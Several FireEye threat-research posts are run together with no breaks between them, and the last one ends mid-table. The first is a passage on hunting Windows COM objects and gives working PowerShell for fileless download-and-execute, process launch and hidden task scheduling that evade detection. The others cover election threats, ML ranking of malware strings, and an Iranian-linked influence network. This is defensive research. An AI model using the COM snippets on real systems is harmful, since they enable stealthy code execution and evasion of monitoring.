The InprocServer32 entry for this object was set to C:\windows\system32\wat\watweb.dll, which is part of Microsoft’s Windows Genuine Advantage product key validation system. The LaunchSystemApplication method expected three parameters, but this COM object was not well-documented and reverse engineering was required, meaning it was time to dig through some assembly code.

Once C:\windows\system32\wat\watweb.dll is loaded in your favorite tool (in this case, IDA Pro), it’s time to find where this method is defined. Luckily, in this case, Microsoft exposed debugging symbols, making the reverse engineering much more efficient. Looking at the disassembly, LaunchSystemApplication calls LaunchSystemApplicationInternal, which, as one might suspect, calls CreateProcess to launch an application. This is shown in the Hex-Rays decompiler pseudocode in Figure 5.


Figure 5: Hex-Rays pseudocode confirming that LaunchSystemApplicationInternal calls CreateProcessW

But does this COM object allow creation of arbitrary processes? The argument passed to CreateProcess is user-controlled and is derived from the arguments passed to the function. However, notice the call to CWgpOobWebObjectBaseT::IsApprovedApplication prior to the CreateProcess call. The Hex-Rays pseudocode for this method is shown in Figure 6.


Figure 6: Hex-Rays pseudocode for the IsApprovedApplication method

The user-controlled string is validated against a specific pattern. In this case, the string must match slui.exe. Furthermore, the user-controlled string is then appended to the system path, meaning it would be necessary to, for instance, replace the real slui.exe to circumvent the check. Unfortunately, the validation performed by Microsoft limits the usefulness of this method as a general-purpose process launcher.

In other cases, code execution was straightforward. For example, the ProcessChain Class with CLSID {E430E93D-09A9-4DC5-80E3-CBB2FB9AF28E} that is implemented in C:\Program Files (x86)\Windows Kits\10\App Certification Kit\prchauto.dll. This COM class can be readily analyzed without looking at any disassembly listings, because prchauto.dll contains a TYPELIB resource containing a COM Type Library that can be viewed using Oleview.exe. Figure 7 shows the type library for ProcessChainLib, exposing a CommandLine property and a Start method. Start accepts a reference to a Boolean value.


Figure 7: Type library for ProcessChainLib as displayed in Interface Definition Language by Oleview.exe

Based on this, commands can be started as shown in Figure 8.

$handle = [activator]::CreateInstance([type]::GetTypeFromCLSID("E430E93D-09A9-4DC5-80E3-CBB2FB9AF28E"))
$handle.CommandLine = "cmd /c whoami"
$handle.Start([ref]$True)

Figure 8: Using the ProcessChainLib COM server to start a process

Enumerating and examining COM objects in this fashion turned up other interesting finds as well.

Fileless Download and Execute

For instance, the COM object {F5078F35-C551-11D3-89B9-0000F81FE221} (Msxml2.XMLHTTP.3.0) exposes an XML HTTP 3.0 feature that can be used to download arbitrary code for execution without writing the payload to the disk and without triggering rules that look for the commonly-used System.Net.WebClient. The XML HTTP 3.0 object is usually used to perform AJAX requests. In this case, data fetched can be directly executed using the Invoke-Expression cmdlet (IEX).

The example in Figure 9 executes our code locally:

$o = [activator]::CreateInstance([type]::GetTypeFromCLSID("F5078F35-C551-11D3-89B9-0000F81FE221")); $o.Open("GET", "http://127.0.0.1/payload", $False); $o.Send(); IEX $o.responseText;

Figure 9: Fileless download without System.Net.WebClient

Task Scheduling

Another example is {0F87369F-A4E5-4CFC-BD3E-73E6154572DD} which implements the Schedule.Service class for operating the Windows Task Scheduler Service. This COM object allows privileged users to schedule a task on a host (including a remote host) without using the schtasks.exe binary or the at command.

$TaskName = [Guid]::NewGuid().ToString()
$Instance = [activator]::CreateInstance([type]::GetTypeFromProgID("Schedule.Service"))
$Instance.Connect()
$Folder = $Instance.GetFolder("\")
$Task = $Instance.NewTask(0)
$Trigger = $Task.triggers.Create(0)
$Trigger.StartBoundary = Convert-Date -Date ((Get-Date).addSeconds($Delay))
$Trigger.EndBoundary = Convert-Date -Date ((Get-Date).addSeconds($Delay + 120))
$Trigger.ExecutionTimelimit = "PT5M"
$Trigger.Enabled = $True
$Trigger.Id = $Taskname
$Action = $Task.Actions.Create(0)
$Action.Path = “cmd.exe”
$Action.Arguments = “/c whoami”
$Action.HideAppWindow = $True
$Folder.RegisterTaskDefinition($TaskName, $Task, 6, "", "", 3)

function Convert-Date {       

        param(
             [datetime]$Date

        )       

        PROCESS {
               $Date.Touniversaltime().tostring("u") -replace " ","T"
        }
}

Figure 10: Scheduling a task

Conclusion

COM objects are very powerful, versatile, and integrated with Windows, which means that they are nearly always available. COM objects can be used to subvert different detection patterns including command line arguments, PowerShell logging, and heuristic detections. Stay tuned for part 2 of this blog series as we will continue to look at hunting COM objects.

Framing the Problem: Cyber Threats and Elections

This year, Canada, multiple European nations, and others will host high profile elections. The topic of cyber-enabled threats disrupting and targeting elections has become an increasing area of awareness for governments and citizens globally. To develop solutions and security programs to counter cyber threats to elections, it is important to begin with properly categorizing the threat. In this post, we’ll explore the various threats to elections FireEye has observed and provide a framework for organizations to sort these activities.

The Election Ecosystem: Targets

Historically, FireEye has observed targeting of a wide range of organizations connected to elections. In considering their role and criticality to the process of elections, these various entities can be grouped into three categories: core election infrastructure, supporting organizations involved in the administration of elections, and other groups that have a participatory role in the electoral process. All of these entities may be targeted for a variety of reasons to influence or collect intelligence on the electoral process and participants.

FireEye is aware of only limited indications of entities targeted in the first category (light blue area). Although we have not observed direct evidence that actors have manipulated the electoral process in any major national or regional election by infiltrating the systems or hardware used to record or tally votes, the sheer complexity of these systems prevents us from categorically stating that these systems have not been successfully compromised.

Moving outward into the gray section of the diagram, entities that fall into this category include organizations involved in the administration of elections. While these organizations may maintain networks separate from voting systems and tabulation platforms, they play important roles in overseeing and communicating results to the public. FireEye has witnessed breaches into a variety of these organizations, in some cases for the purpose of collecting intelligence or in others to coopt and display false information on publicly-facing systems as part of an influence campaign.

Lastly, FireEye has observed targeting of organizations that are involved in election campaigns and news coverage. Tactics we have witnessed include disinformation campaigns on adversary-maintained infrastructure and social media platforms. For example, in August 2017, we observed several inauthentic news websites created to mimic legitimate local and international media organizations ahead of a sub-Saharan African nation’s presidential election. A subset of the counterfeit domains appears to have been created in coordination with each other, if not by the same actor, to damage the reputation of the presidential nominee for the opposition party.

The Threat Activity

To counter and mitigate risks to elections, properly categorizing the specific activity and intent is important. While terms like “election interference” are often used to describe all of the threats in this space, some of the malicious activity FireEye has witnessed may fall outside this definition. Broadly speaking most election-related threats can be thought of in four categories: social-media enabled disinformation, cyber espionage, “hack and leak” campaigns, and attacks on critical election infrastructure.

  • Social-Media Enabled Disinformation: This category includes the activity FireEye has tracked from the Russia-affiliated Internet Research Association (IRA) and various Iranian disinformation operations. In some cases, this has involved creating fraudulent content on controversial issues and seeking to promote it across social media platforms. In other examples, disinformation campaigns have focused on amplifying already issues that have organic interest. Some of these campaigns may also be involved in politically-motivated messaging on social media platforms prior to elections without a specific focus electoral events.
  • Cyber Espionage: Nation state actors like Russia-nexus APT28 and Sandworm Team, and China-nexus APT40, have carried out cyber espionage operations against multiple types of targets in the election ecosystem. This has ranged from intrusions into everything from political campaigns to election commissions, likely for a variety of reasons. In some cases, these actors are possibly seeking to obtain information on policy stances of candidates and political parties. In other situations—particularly against election administrators or system vendors—it is possible that these intrusions are reconnaissance for further operations, seeking to understand network layouts that may allow them to move into more critical infrastructure.   
  • “Hack and Leak” Campaigns: Some threat actors that FireEye has observed have utilized the data they’ve gained from espionage intrusions to then leak that information with the intent of influencing public perception. In this manner, they combine the previous two categories of activity. Notably, this tactic has been employed by Guccifer 2.0 and DC Leaks in the 2016 U.S. election. In some cases, similar tactics have leveraged compromised infrastructure to carry out disinformation operations, such as in the 2014 Ukrainian presidential campaign in which Russian-nexus actors posted erroneous election results from the compromised Ukrainian election commission website.
  • Attacks on Critical Election Infrastructure : Compromises into core critical infrastructure such as election management systems, voting systems, electronic pollbooks, and others represent the most critical risks to elections, with the potential to alter or delete votes or voters from voter rolls. Though this is an often-discussed risk, there is limited evidence of intrusion activity targeting core election infrastructure.

Of the activity described here, FireEye has observed a full spectrum of campaigns by Russian-nexus actors, from carrying out intrusions into organizations and stealing data, leaking that data through online personas and fronts, as well as targeting of election infrastructure. From limited observations, China has for the most part focused solely on cyber espionage operations, as in the case of activity FireEye reported on in the targeting the 2018 Cambodian election. From various motivations, FireEye has also witnessed limited evidence of activity from hacktivists and criminal entities in targeting parts of the election ecosystem.

Conclusion

While there is increasing global awareness of threats to elections, election administrators and others continue to face challenges in ensuring the integrity of the vote. To properly counter threats to elections, individuals and organizations involved in the electoral process should:

  • Learn the Playbook of the Adversary: Proactive organizations can learn from the activity of threat actors uncovered in other elections and implement security controls that adapt to new tools and TTPs. Political campaigns and others should also educate staff and contractors on common spear-phishing tactics used by some of the primary APT groups.
  • Incorporate Threat Intelligence for Context: Operationally, security organizations can utilize threat intelligence to better differentiate and triage the most important alerts from untargeted commodity malware activity.
  • Anticipate External Threats: Beyond the internal networks of county governments and political campaigns, election administrators and risk management professionals involved in elections should prepare plans for dealing with leaked and compromised data, understanding how threat actors may utilize this for disinformation campaigns.

I will be speaking about cyber threats and elections during FireEye Virtual Summit, so register today to learn more.

Learning to Rank Strings Output for Speedier Malware Analysis

Reverse engineers, forensic investigators, and incident responders have an arsenal of tools at their disposal to dissect malicious software binaries. When performing malware analysis, they successively apply these tools in order to gradually gather clues about a binary’s function, design detection methods, and ascertain how to contain its damage. One of the most useful initial steps is to inspect its printable characters via the Strings program. A binary will often contain strings if it performs operations like printing an error message, connecting to a URL, creating a registry key, or copying a file to a specific location – each of which provide crucial hints that can help drive future analysis.

Manually filtering out these relevant strings can be time consuming and error prone, especially considering that:

  • Relevant strings occur disproportionately less often than irrelevant strings.
  • Larger binaries can output upwards of tens of thousands of individual strings.
  • The definition of "relevant” can vary significantly across individual human analysts.

Investigators would never want to miss an important clue that could have reduced their time spent performing the malware analysis, or even worse, led them to draw incomplete or incorrect conclusions. In this blog post, we will demonstrate how the FireEye Data Science (FDS) and FireEye Labs Reverse Engineering (FLARE) teams recently collaborated to streamline this analyst pain point using machine learning.

Highlights

  • Running the Strings program on a piece of malware inevitably produces noisy strings mixed in with important ones, which can only be uncovered after sifting and scrolling through the entirety of its messy output. FireEye’s new machine learning model that automatically ranks strings based on their relevance for malware analysis speeds up this process at scale.
  • Knowing which individual strings are relevant often requires highly experienced analysts. Quality, security-relevant labeled training data can be time consuming and expensive to obtain, but weak supervision that leverages the domain expertise of reverse engineers helps accelerate this bottleneck.
  • Our proposed learning-to-rank model can efficiently prioritize Strings outputs from individual malware samples. On a dataset of relevant strings from over 7 years of malware reports authored by FireEye reverse engineers, it also performs well based on criteria commonly used to evaluate recommendation and search engines.

Background

Each string returned by the Strings program is represented by sequences of 3 characters or more ending with a null terminator, independent of any surrounding context and file formatting. These loose criteria mean that Strings may identify sequences of characters as strings when they are not human-interpretable. For example, if consecutive bytes 0x31, 0x33, 0x33, 0x37, 0x00 appear within a binary, Strings will interpret this as “1337.” However, those ASCII characters may not actually represent that string per se; they could instead represent a memory address, CPU instructions, or even data utilized by the program. Strings leaves it up to the analyst to filter out such irrelevant strings that appear within its output. For instance, only a handful of the strings listed in Figure 1 that originate from an example malicious binary are relevant from a malware analyst’s point of view.


Figure 1: An example Strings output containing 44 strings for a toy sample with a SHA-256 value of eb84360ca4e33b8bb60df47ab5ce962501ef3420bc7aab90655fd507d2ffcedd.

Ranking strings in terms of descending relevance would make an analyst’s life much easier. They would then only need to focus their attention on the most relevant strings located towards the top of the list, and simply disregard everything below. However, solving the task of automatically ranking strings is not trivial. The space of relevant strings is unstructured and vast, and devising finely tuned rules to robustly account for all the possible variations among them would be a tall order.

Learning to Rank Strings Output

This task can instead be formulated in a machine learning (ML) framework called learning to rank (LTR), which has been historically applied to problems like information retrieval, machine translation, web search, and collaborative filtering. One way to tackle LTR problems is by using Gradient Boosted Decision Trees (GBDTs). GBDTs successively learn individual decision trees that reduce the loss using a gradient descent procedure, and ultimately use a weighted sum of every trees’ prediction as an ensemble. GBDTs with an LTR objective function can learn class probabilities to compute each string’s expected relevance, which can then be used to rank a given Strings output. We provide a high-level overview of how this works in Figure 2.

In the initial train() step of Figure 2, over 25 thousand binaries are run through the Strings program to generate training data consisting of over 18 million total strings. Each training sample then corresponds to the concatenated list of ASCII and Unicode strings output by the Strings program on that input file. To train the model, these raw strings are transformed into numerical vectors containing natural language processing features like Shannon entropy and character co-occurrence frequencies, together with domain-specific signals like the presence of indicators of compromise (e.g. file paths, IP addresses, URLs, etc.), format strings, imports, and other relevant landmarks.


Figure 2: The ML-based LTR framework ranks strings based on their relevance for malware analysis. This figure illustrates different steps of the machine learning modeling process: the initial train() step is denoted by solid arrows and boxes, and the subsequent predict() and sort() steps are denoted by dotted arrows and boxes.

Each transformed string’s feature vector is associated with a non-negative integer label that represents their relevance for malware analysis. Labels range from 0 to 7, with higher numbers indicating increased relevance. To generate these labels, we leverage the subject matter knowledge of FLARE analysts to apply heuristics and impose high-level constraints on the resulting label distributions. While this weak supervision approach may generate noise and spurious errors compared to an ideal case where every string is manually labeled, it also provides an inexpensive and model-agnostic way to integrate domain expertise directly into our GBDT model.

Next during the predict() step of Figure 2, we use the trained GBDT model to predict ranks for the strings belonging to an input file that was not originally part of the training data, and in this example query we use the Strings output shown in Figure 1. The model predicts ranks for each string in the query as floating-point numbers that represent expected relevance scores, and in the final sort() step of Figure 2, strings are sorted in descending order by these scores. Figure 3 illustrates how this resulting prediction achieves the desired goal of ranking strings according to their relevance for malware analysis.


Figure 3: The resulting ranking on the strings depicted in both Figure 1 and in the truncated query of Figure 2. Contrast the relative ordering of the strings shown here to those otherwise identical lists.

The predicted and sorted string rankings in Figure 3 show network-based indicators on top of the list, followed by registry paths and entries. These reveal the potential C2 server and malicious behavior on the host. The subsequent output consisting of user-related information is more likely to be benign, but still worthy of investigation. Rounding out the list are common strings like Windows API functions and PE artifacts that tend to raise no red flags for the malware analyst.

Quantitative Evaluation

While it seems like the model qualitatively ranks the above strings as expected, we would like some quantitative way to assess the model’s performance more holistically. What evaluation criteria can we use to convince ourselves that the model generalizes beyond the coverage of our weak supervision sources, and to compare models that are trained with different parameters?

We turn to the recommender systems literature, which uses the Normalized Discounted Cumulative Gain (NDCG) score to evaluate ranking of items (i.e. individual strings) in a collection (i.e. a Strings output). NDCG sounds complicated, but let’s boil it down one letter at a time:

  • “G” is for gain, which corresponds to the magnitude of each string’s relevance.
  • “C” is for cumulative, which refers to the cumulative gain or summed total of every string’s relevance.
  • “D” is for discounted, which divides each string’s predicted relevance by a monotonically increasing function like the logarithm of its ranked position, reflecting the goal of having the most relevant strings ranked towards the top of our predictions.
  • “N” is for normalized, which means dividing DCG scores by ideal DCG scores calculated for a ground truth holdout dataset, which we obtain from FLARE-identified relevant strings contained within historical malware reports. Normalization makes it possible to compare scores across samples since the number of strings within different Strings outputs can vary widely.


Figure 4: Kernel Density Estimate of NDCG@100 scores for Strings outputs from the holdout dataset. Scores are calculated for the original ordering after simply running the Strings program on each binary (gray) versus the predicted ordering from the trained GBDT model (red).

In practice, we take the first k strings indexed by their ranks within a single Strings output, where the k parameter is chosen based on how many strings a malware analyst will attend to or deem relevant on average. For our purposes we set k = 100 based on the approximate average number of relevant strings per Strings output. NDCG@k scores are bounded between 0 and 1, with scores closer to 1 indicating better prediction quality in which more relevant strings surface towards the top. This measurement allows us to evaluate the predictions from a given model versus those generated by other models and ranked with different algorithms.

To quantitatively assess model performance, we run the strings from each sample that have ground truth FLARE reports though the predict() step of Figure 2, and compare their predicted ranks with a baseline of the original ranking of strings output by Strings. The divergence in distributions of NDCG@100 scores between these two approaches demonstrates that the trained GBDT model learns a useful structure that generalizes well to the independent holdout set (Figure 4).

Conclusion

In this blog post, we introduced an ML model that learns to rank strings based on their relevance for malware analysis. Our results illustrate that it can rank Strings output based both on qualitative inspection (Figure 3) and quantitative evaluation of NDCG@k (Figure 4). Since Strings is so commonly applied during malware analysis at FireEye and elsewhere, this model could significantly reduce the overall time required to investigate suspected malicious binaries at scale. We plan on continuing to improve its NDCG@k scores by training it with more high fidelity labeled data, incorporating more sophisticated modeling and featurization techniques, and soliciting further analyst feedback from field testing.

It’s well known that malware authors go through great lengths to conceal useful strings from analysts, and a potential blind spot to consider for this model is that the utility of Strings itself can be thwarted by obfuscation. However, open source tools like the FireEye Labs Obfuscated Strings Solver (FLOSS) can be used as an in-line replacement for Strings. FLOSS automatically extracts printable strings just as Strings does, but additionally reveals obfuscated strings that have been encoded, packed, or manually constructed on the stack. The model can be readily trained on FLOSS outputs to rank even obfuscated strings. Furthermore, since it can be applied to arbitrary lists of strings, the model could also be used to rank strings extracted from live memory dumps and sandbox runs.

This work represents a collaboration between the FDS and FLARE teams, which together build predictive models to help find evil and improve outcomes for FireEye’s customers and products. If you are interested in this mission, please consider joining the team by applying to one of our job openings.

Network of Social Media Accounts Impersonates U.S. Political Candidates, Leverages U.S. and Israeli Media in Support of Iranian Interests

In August 2018, FireEye Threat Intelligence released a report exposing what we assessed to be an Iranian influence operation leveraging networks of inauthentic news sites and social media accounts aimed at audiences around the world. We identified inauthentic social media accounts posing as everyday Americans that were used to promote content from inauthentic news sites such as Liberty Front Press (LFP), US Journal, and Real Progressive Front. We also noted a then-recent shift in branding for some accounts that had previously self-affiliated with LFP; in July 2018, the accounts dropped their LFP branding and adopted personas aligned with progressive political movements in the U.S. Since then, we have continued to investigate and report on the operation to our intelligence customers, detailing the activity of dozens of additional sites and hundreds of additional social media accounts.

Recently, we investigated a network of English-language social media accounts that engaged in inauthentic behavior and misrepresentation and that we assess with low confidence was organized in support of Iranian political interests. In addition to utilizing fake American personas that espoused both progressive and conservative political stances, some accounts impersonated real American individuals, including a handful of Republican political candidates that ran for House of Representatives seats in 2018. Personas in this network have also had material published in U.S. and Israeli media outlets, attempted to lobby journalists to cover specific topics, and appear to have orchestrated audio and video interviews with U.S. and UK-based individuals on political issues. While we have not at this time tied these accounts to the broader influence operation we identified last year, they promoted material in line with Iranian political interests in a manner similar to accounts that we have previously assessed to be of Iranian origin. Most of the accounts in the network appear to have been suspended on or around the evening of 9 May, 2019. Appendix 1 provides a sample of accounts in the network.

The Network

The accounts, most of which were created between April 2018 and March 2019, used profile pictures appropriated from various online sources, including, but not limited to, photographs of individuals on social media with the same first names as the personas. As with some of the accounts that we identified to be of Iranian origin last August, some of these new accounts self-described as activists, correspondents, or “free journalist[s]” in their user descriptions. Some accounts posing as journalists claimed to belong to specific news organizations, although we have been unable to identify individuals belonging to those news organizations with those names.

Narratives promoted by these and other accounts in the network included anti-Saudi, anti-Israeli, and pro-Palestinian themes. Accounts expressed support for the Joint Comprehensive Plan of Action (JCPOA), commonly known as the Iran nuclear deal; opposition to the Trump administration’s designation of Iran’s Islamic Revolutionary Guard Corps (IRGC) as a Foreign Terrorist Organization; antipathy toward the Ministerial to Promote a Future of Peace and Security in the Middle East (a U.S.-led conference that focused on Iranian influence in the Middle East more commonly known as the February 2019 Warsaw Summit); and condemnation of U.S. President Trump’s veto of a resolution passed by Congress to end U.S. involvement in the Yemen conflict.


Figure 1: Sample tweets on the Trump administration’s designation of Iran’s IRGC as a Foreign Terrorist Organization

Interestingly, some accounts in the network also posted a small amount of messaging seemingly contradictory to their otherwise pro-Iran stances. For example, while one account’s tweets were almost entirely in line with Iranian political interests, including a tweet claiming that “iran has shown us that his nuclear program is peaceful [sic],” the account also posted a series of tweets directed at U.S. President Trump on Sept. 25, 2018, the same day that he gave a speech to the United Nations in which he excoriated the Iranian Government. The account called on Trump to attack Iran, using the hashtags #attack_Iran, #go_to_hell_Rouhani, #stop_sanctions, #UnitedNations, and #trump_speech; other accounts in the network, which likewise predominantly held pro-Iran stances, echoed these sentiments, using the same or similar hashtags. It is possible that these accounts were seeking to build an audience with views antipathetic to Iran that could then later be targeted with pro-Iranian messaging.

Apart from the narratives and messaging promoted, we observed several limited indicators that the network was operated by Iranian actors. For example, one account in the network, @AlexRyanNY, created in 2010, had only two visible tweets prior to 2017, one of which, from 2011, was in Persian and of a personal nature. Subsequently in 2017, @AlexRyanNY claimed in a tweet to be “an Iranian who supported Hillary” in a tweet directed at a Democratic political strategist. This account, using the display name “Alex Ryan” and claiming to be a Newsday correspondent, appropriated the photograph of a genuine individual also with the first name of Alex. We note that it is possible that the account was compromised from another individual or that it was merely repurposed by the same actor. Additionally, while most of the accounts in the network had their interface languages set to English, we observed that one account had its interface language set to Persian.

Impersonation of U.S. Political Candidates

Some Twitter accounts in the network impersonated Republican political candidates that ran for House of Representatives seats in the 2018 U.S. congressional midterms. These accounts appropriated the candidates’ photographs and, in some cases, plagiarized tweets from the real individuals’ accounts. Aside from impersonating real U.S. political candidates, the behavior and activity of these accounts resembled that of the others in the network.

For example, the account @livengood_marla impersonated Marla Livengood, a 2018 candidate for California’s 9th Congressional District, using a photograph of Livengood and a campaign banner for its profile and background pictures. The account began tweeting on Sept. 24, 2018, with its first tweet plagiarizing one from Livengood’s official account earlier that month:


Figure 2: Tweet by suspect account @livengood_marla, dated Sept. 24, 2018 (left); tweet by Livengood’s verified account, dated Sept. 1, 2018 (right)

The @livengood_marla account plagiarized a number of other tweets from Livengood’s official account, including some that referenced Livengood’s official account username:


Figure 3: Tweet by suspect account @livengood_marla, dated Sept. 24, 2018 (left); tweet by Livengood’s verified account, dated Sept. 3, 2018 (right)

The @livengood_marla account also tweeted various news snippets on both political and apolitical subjects, such as the confirmation of Brett Kavanaugh to the U.S. Supreme Court and the wedding of the UK’s Princess Eugenie and Jack Brooksbank, prior to segueing into promoting material more closely aligned with Iranian interests. For example, the account, along with others in the network, commemorated the United Nations’ International Day of the Girl Child with a photograph of emaciated children in Yemen, as well as narratives pertaining to the killing of Saudi journalist Jamal Khashoggi and Saudi Shiite child Zakaria al-Jaber, intended to portray Saudi Arabia in a negative light.

In another example, the account @ButlerJineea impersonated Jineea Butler, a 2018 candidate for New York’s 13th Congressional District, using a photograph of Butler for its profile picture and incorporating her campaign slogans into its background picture, as well as claiming in its Twitter bio to be a “US House candidate, NY-13” and linking to Butler’s website, jineeabutlerforcongress.com.


Figure 4: Suspect account @ButlerJineea (left); apparent legitimate, currently inactive account @Jineea4congress (right)

These and other accounts in the network plagiarized tweets from additional sources beyond the individuals they impersonated, including other U.S. politicians, about both political and apolitical topics.

Influence Activity Leveraged U.S. and Israeli Media

In addition to directly posting material on social media, we observed some personas in the network leverage legitimate print and online media outlets in the U.S. and Israel to promote Iranian interests via the submission of letters, guest columns, and blog posts that were then published. We also identified personas that we suspect were fabricated for the sole purpose of submitting such letters, but that do not appear to maintain accounts on social media. The personas claimed to be based in varying locations depending on the news outlets they were targeting for submission; for example, a persona that listed their location as Seattle, WA in a letter submitted to the Seattle Times subsequently claimed to be located in Baytown, TX in a letter submitted to The Baytown Sun. Other accounts in the network then posted links to some of these letters on social media.

The letters and columns, many of which were published in 2018 and 2019, but which date as far back as 2015, were mostly published in small, local U.S. news outlets; however, several larger outlets have also published material that we suspect was submitted by these personas (see Appendix 2). In at least two cases, the text of letters purportedly authored by different personas and published in different newspapers was identical or nearly identical, while in other instances, separate personas promoted the same narratives in letters published within several days of each other. The published material was not limited to letters; one persona, “John Turner,” maintained a blog on The Times of Israel website from January 2017 to November 2018, and wrote articles for the U.S.-based site Natural News Blogs from August 2015 to July 2018. The letters and articles primarily addressed themes or promoted stances in line with Iranian political interests, similar to the activity conducted on social media.


Figure 5: Sample letter published in Galveston County’s (Texas) The Daily News, authored by suspect persona Mathew O’Brien

We have thus far identified at least five suspicious personas that have had letters or other content published by legitimate news outlets. We surmise that additional personas exist, based on other investigatory leads.

“John Turner”: The John Turner persona has been active since at least 2015. Turner has claimed to be based, variously, in New York, NY, Seattle, WA, and Washington, DC. Turner described himself as a journalist in his Twitter profile, though has also claimed both to work at the Seattle Times and to be a student at Villanova University, claiming to be attending between 2015 and 2020. In addition to letters published in various news outlets, John Turner maintained a blog on The Times of Israel site in 2017 and 2018 and has written articles for Natural News Blogs. At least one of Turner’s letters was promoted in a tweet by another account in the network.

“Ed Sullivan”: The Ed Sullivan persona, which has on at least one occasion used the same headshot as that of John Turner, has had letters published in the Galveston County, Texas-based The Daily News, the New York Daily News, and the Los Angeles Times, including some letters identical in text to those authored by the “Jeremy Watte” persona (see below) published in the Texas-based outlet The Baytown Sun. Ed Sullivan has claimed his location to be, variously, Galveston and Newport News (Virginia).

“Mathew Obrien”: The Mathew Obrien persona, whose name has also been spelled “Matthew Obrien” and “Mathew O’Brien”, claimed in his Twitter bio to be a Newsday correspondent. The persona has had letters published in Galveston County’s The Daily News and the Athens, Texas-based Athens Daily Review; in those letters, his claimed locations were Galveston and Athens, respectively, while the persona’s Twitter account, @MathewObrien1, listed a location of New York, NY. At least one of Obrien’s letters was promoted in a tweet by another account in the network.

“Jeremy Watte”: Letters signed by the Jeremy Watte persona have been published in The Baytown Sun and the Seattle Times, where he claimed to be based in Baytown and Seattle, respectively. The texts of at least two letters signed by Jeremy Watte are identical to that in letters published in other newspapers under the name Ed Sullivan. At least one of his letters was promoted in a tweet by another account in the network.

“Isabelle Kingsly”: The Isabelle Kingsly persona claimed on her Twitter profile (@IsabelleKingsly) to be an “Iranian-American” based in Seattle, WA. Letters signed by Kingsly have appeared in The Baytown Sun and the Newport News Virginia local paper The Daily Press; in those letters, Kingsly’s location is listed as Galveston and Newport News, respectively. The @IsabelleKingsly Twitter account’s profile picture and other posted pictures were appropriated from a social media account of what appears to be a real individual with the same first name of Isabelle. At least one of Kingsly’s letters was promoted in a tweet by another account in the network.

Other Media Activity

Personas in the network also engaged in other media-related activity, including criticism and solicitation of mainstream media coverage, and conducting remote video and audio interviews with real U.S. and UK-based individuals while presenting themselves as journalists. One of those latter personas presented as working for a mainstream news outlet.

Criticism/Solicitation of Media Coverage

Accounts in the network directed tweets at mainstream media outlets, calling on them to provide coverage of topics aligned with Iranian interests or, alternatively, criticizing them for insufficient coverage of those topics. For example, we observed accounts criticizing media outlets over their lack of coverage of the killing of Shiite child Zakaria al-Jaber in Saudi Arabia, as well as Saudi Arabia’s conduct in the Yemen conflict. While such activity might have been intended to directly influence the media outlets’ reporting, the accounts may have also been aiming to reach a wider audience by tweeting at outlets with a large following that woud see those replies.


Figure 6: Sample tweets by suspect accounts calling on mainstream media outlets to increase their coverage of alleged Saudi activity in the Yemen conflict

“Media” Interviews with Real U.S., UK-Based Individuals

Accounts in the network, under the guise of journalist personas, also solicited various individuals over Twitter for interviews and chats, including real journalists and politicians. The personas appear to have successfully conducted remote video and audio interviews with U.S. and UK-based individuals, including a prominent activist, a radio talk show host, and a former U.S. Government official, and subsequently posted the interviews on social media, showing only the individual being interviewed and not the interviewer. The interviewees expressed views that Iran would likely find favorable, discussing topics such as the February 2019 Warsaw summit, an attack on a military parade in the Iranian city of Ahvaz, and the killing of Jamal Khashoggi.

The provenance of these interviews appear to have been misrepresented on at least one occasion, with one persona appearing to have falsely claimed to be operating on behalf of a mainstream news outlet; a remote video interview with a US-based activist about the Jamal Khashoggi killing was posted by an account adopting the persona of a journalist from the outlet Newsday, with the Newsday logo also appearing in the video. We did not identify any Newsday interview with the activist in question on this topic. In another instance, a persona posing as a journalist directed tweets containing audio of an interview conducted with a former U.S. Government official at real media personalities, calling on them to post about the interview.

Conclusion

We are continuing to investigate this and potentially related activity that may be being conducted by actors in support of Iranian interests. At this time, we are unable to provide further attribution for this activity, and we note the possibility that the activity could have been designed for alternative purposes or include some small percentage of authentic behavior. However, if it is of Iranian origin or supported by Iranian state actors, it would demonstrate that Iranian influence tactics extend well beyond the use of inauthentic news sites and fake social media personas, to also include the impersonation of real individuals on social media and the leveraging of legitimate Western news outlets to disseminate favorable messaging. If this activity is being conducted by the same or related actors as those responsible for the Liberty Front Press network of inauthentic news sites and affiliated social media accounts that we exposed in August 2018, it may also suggest that these actors remain undeterred by public exposure or by social media platforms’ shutdowns of their accounts, and that they continue to seek to influence audiences within the U.S. toward positions in line with Iranian political interests.

Appendices

Appendix 1: Sample Twitter accounts identified in this network, currently suspended.

Username

Display Name

Bio

Creation Date

Location

@MichaelA22444

Michael Anderson

Free journalist #resist

3/16/2019

DC

@sammichelsn1995

Sam Michelson

Journalist.

In search of reality.

1995.

Resistance.

3/14/2019

 

@JasonCa26738291

Jason Campbell

It’s our duty to leave our Country-to our children-better than we found it

2/20/2019

 

@SaraMar44752473

Sara Martin

 

1/24/2019

 

@LisaBro09759828

Lisa Brown

 

1/24/2019

 

@Jennife67352965

Jennifer Parker

I AM

1/23/2019

 

@SusanSc25255529

Susan Scott

Don't think too hard, just have fun with life...

1/22/2019

 

@LindaJa02370118

Linda Jackson

I drink lots of tea...

1/22/2019

 

@MarkAda05568324

Mark Adams

 

1/22/2019

 

@aliisseeeee

alliisse

Liberty

1/21/2019

New York

@morsi18

morsi

 

1/13/2019

 

@AntiReality2

Anti_Reality

Very angry

mad at politicians

In favor of sick minds

1/9/2019

North Carolina, USA

@JennyMick3

Jenny Mick

Unemployment

Widow

mother of two

1/9/2019

Pennsylvania, USA

@JaneAnton9

Jane Anton

Daughter of best parent.

 

Do your best, just let your success shows your efforts.

1/9/2019

California, USA

@RabinAntonio

Antonio Rabin

Student at Harvard college.

somehow into politics.

I love gym

1/9/2019

 

@Angelofhuman1

Angel of human

I do into beauty and humanity

12/26/2018

California, USA

@AliciaHernan3

Alicia Hernan

Wife, mom of tow sons, student,

in favor of peace.

12/26/2018

New York, USA

@ThomasRace3

Thomas Race

Bodybuilding

sports and into Music and gym

12/25/2018

Michigan, USA

@EmmaWil14155495

Emma Wilkerson

Student in college  studying International law

12/25/2018

Sunnyvale, CA

@Kevin24798000

Kevin

A free person from everywhere

I'm somehow into politics

12/15/2018

New York, USA

@ImanRashedii

Iman Rashed

Correspondent at  https://t.co/3hxSgtkuXh.  🎥📸Freelance Journalist.    ➡️➡️oppose War and Brutality 💆‍♂️I was born in Beirut

12/8/2018

London

@emAnderson1996

emily anderson

In search of peace.

Really into politics and justice.

Love US and other countries.

10/6/2018

New York, USA

@FordNaava

naava ford

 

10/2/2018

 

@MaazRoss

maaz ross

follow back

9/30/2018

 

@sam86523055

ResistSam

high educated free journalist in favor of politics

in search of reality

Middle East issues

9/29/2018

New York, USA

@ButlerJineea

Jineea Butler

